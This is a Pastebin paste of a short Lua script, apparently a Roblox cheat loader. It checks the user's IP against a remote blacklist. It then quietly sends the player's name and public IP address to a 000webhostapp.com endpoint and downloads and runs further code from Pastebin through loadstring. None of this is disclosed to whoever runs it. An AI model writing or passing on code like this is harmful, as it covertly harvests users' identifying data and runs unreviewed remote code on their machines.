Advertisement
Guest User

Untitled

a guest
Jul 22nd, 2019
197
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.87 KB | None | 0 0
  1. if string.find(game:HttpGet("https://pastebin.com/raw/5J8kdtz3"), game:HttpGet("http://api.ipify.org/")) then
  2. game.Players.LocalPlayer:Kick("You have been blacklisted from using this script! Message LAZ3R#3702 on disc for further help.")
  3. else
  4. logsbasically = game:HttpGet("https://sadlife124562.000webhostapp.com/xd.php")
  5. if string.find(logsbasically, game.Players.LocalPlayer.Name) then
  6. posted = true
  7. else
  8. posted = false
  9. end
  10.  
  11. if posted == false then
  12. ip = game:HttpGet("http://api.ipify.org/")
  13. text = "Name : "..game.Players.LocalPlayer.Name.." |||| ".."IP = "..ip
  14. name = game.Players.LocalPlayer.Name
  15. game:HttpGet("https://sadlife124562.000webhostapp.com/index.php?api_paste_code="..text.."&api_paste_name="..name)
  16. wait(3)
  17. loadstring(game:HttpGet("https://pastebin.com/raw/5YyUR4vz"))()
  18. else
  19. wait(3)
  20. loadstring(game:HttpGet("https://pastebin.com/raw/5YyUR4vz"))()
  21. end
  22. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement